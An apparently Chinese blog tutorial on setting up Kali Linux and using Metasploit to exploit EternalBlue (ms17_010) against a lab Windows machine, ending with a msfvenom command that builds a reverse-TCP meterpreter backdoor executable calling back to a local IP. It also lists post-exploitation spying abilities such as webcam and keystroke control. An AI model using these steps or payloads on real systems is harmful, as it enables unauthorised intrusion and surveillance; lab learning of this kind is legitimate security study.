下载安装
官网地址如下:
卡利 Linux |渗透测试和道德黑客 Linux 发行版 (kali.org)
推荐使用模拟器下载,因为kali会配置好环境,如果Windows,Mac下载还需自行配备环境。

果然大众使用的还是VM!Download VMware Workstation Pro
下载完成后解压点击后缀为vmx的文件就会自行在VM运行。
进入kali后会需要输入用户名和密码,全部输入kali就好。
metasploit
简介:
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
使用方法:
首先打开我们的kali终端

输入 sudo su ------- 切换到管理员用户 密码仍是kali
接着输入msfconsole进入metasploit命令行界面

msf使用法则:
- 使用模块 -> 配置模块必选项 -> 运行模块
使用metasploit攻击Windows操作系统
这里引用一个漏洞 “永恒之蓝” :
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
微软把这个漏洞列为2017年第10号漏洞,我们可以在kali中搜索到
输入 search ms17_010

exploit 是漏洞攻击脚本,我们想要攻击电脑,就需要引用这些模块
1.直接输入其名字
use exploit/windows/smb/ms17_010_eternalbluete Windows Kernel Pool Corruption
2.输入编号
use 0
引用模块之后,我们还需要设置必选项,方便我们告诉msf我们要做什么,这里输入show options可以查看哪些使我们需要配置的东西(Required中值为yes的使我们必须要配置的)

在Module options其中我们可以发现,VERIFY_ARCH和VERIFY_TARGET是已经配置好的,而RPURT是默认的445也不需要我们去配置,所以只有一个RHOSTS是我们需要配置的,RHOSTS的意思是目标服务器的ip地址
下一列Payload options,攻击宰割 意思大致为“攻击之后想要干什么”,这里面的内容都是默认修改或配置好的不需要我们去动。
这里推荐大家开一台虚拟机来作为靶场攻击,这里以win7为例

首先在Windows终端输入ipconfig来查看此机的ip地址

我们还可以修改最后的132为 0-255 意思就是去攻击一个网段
为了防止攻击失败,我们也可以修改 LPORT 65535个端口随意更改

这里我们已经是修改好了的,接下来就直接可以进行攻击了

输入run就可以进行攻击了(这里ip做了一下修改,因为这 永恒之蓝 毕竟是一个老漏洞了,win7已经对他做出了修改补丁,除非删除系统补丁才能进行攻击,这里为了避免麻烦换了一个win 2008 x64的系统,一定是要64位处理器的系统,不然会报错不能攻击的!!)

输入help可以查看我们能利用这个做些什么,这里包括但不限于:打开电脑录音、摄像头,截取电脑屏幕,关机,输入键盘或鼠标指令等等
使用kali渗透工具生成远控木马
msfvenom是用来生成后门的软件,在目标机上执行后门,在本地进行监听
Windows可执行程序后门:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe
// payload payload_name 系统/架构/作用/方式 payload设置 format output
// windows可改为linux,mac,Android等 exe是Windows可执行文件,根据系统选择

这就做成了一个简易的“计算机病毒”,不过是非常简易的病毒,会轻松被电脑防护系统杀掉
本文介绍了在Kali Linux中进行渗透测试的方法。首先说明了Kali的下载安装,推荐用模拟器下载。接着介绍了Metasploit工具,包括其简介、使用方法和法则,还演示了用它利用“永恒之蓝”漏洞攻击Windows系统。最后提到用Kali渗透工具msfvenom生成远控木马。

1万+

被折叠的 条评论
为什么被折叠?



